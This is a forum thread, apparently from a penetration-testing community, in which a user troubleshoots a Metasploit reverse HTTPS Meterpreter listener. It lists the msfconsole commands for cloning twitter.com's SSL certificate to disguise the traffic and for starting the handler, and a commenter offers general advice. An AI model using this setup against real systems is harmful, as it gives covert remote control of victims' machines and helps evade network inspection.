meterpreter/reverse_https certificate

edited March 13 in Exploits

Hello everyone.
I can't run meterpreter/reverse_https with an ssl certificate.

  1. make a copy of the certificate:
    use auxiliary/gather/impersonate_ssl
    set RHOST twitter.com
    run

  2. Launch the listener:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_https
    set LHOST IP
    set LPORT 8081
    set EnableStageEncoding true
    set StagerVerifySSLCert true
    set HANDLERSSLCERT /root/file.pem
    exploit -j

but after the launch I get this:
msf6 exploit(multi/handler) > exploit -j
[] Exploit running as background job 0.
[
] Exploit completed, but no session was created.
[*] Started HTTPS reverse handler on https://IP:8081

it should be like this:
msf exploit(handler) > exploit -j
[] Meterpreter will verify SSL Certificate with SHA1 hash 5fefcc6cae228b92002a6d168c5a78d495d8c884
[
] Exploit running as background job.

I tried using windows / meterpreter/reverse_winhttps, and everything works fine with it.
Please tell me what my mistake is.

Comments

  • hi

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • can someone tell me what my mistake is?

  • I've no idea, as I've never tried this msf attack.

    Are you confident it should work with windows/meterpreter/reverse_https ?

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • Type your comment> @TazWake said:

    I've no idea, as I've never tried this msf attack.

    Are you confident it should work with windows/meterpreter/reverse_https ?

    yes, it should have worked with this payload.
    I was guided by this article:
    https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation

  • @3TON said:

    yes, it should have worked with this payload.
    I was guided by this article:
    https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation

    OK - (and again, I've never used this exploit so I have no idea about it really) but in general, some boxes respond better to one payload than another.

    If you can get it working with windows/meterpreter/reverse_winhttps but not windows/meterpreter/reverse_https then I'd suggest it is down to the payload.

    For example, there was a ticket last year which seems to have been the opposite problem: https://github.com/rapid7/metasploit-framework/issues/14037

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

Sign In to comment.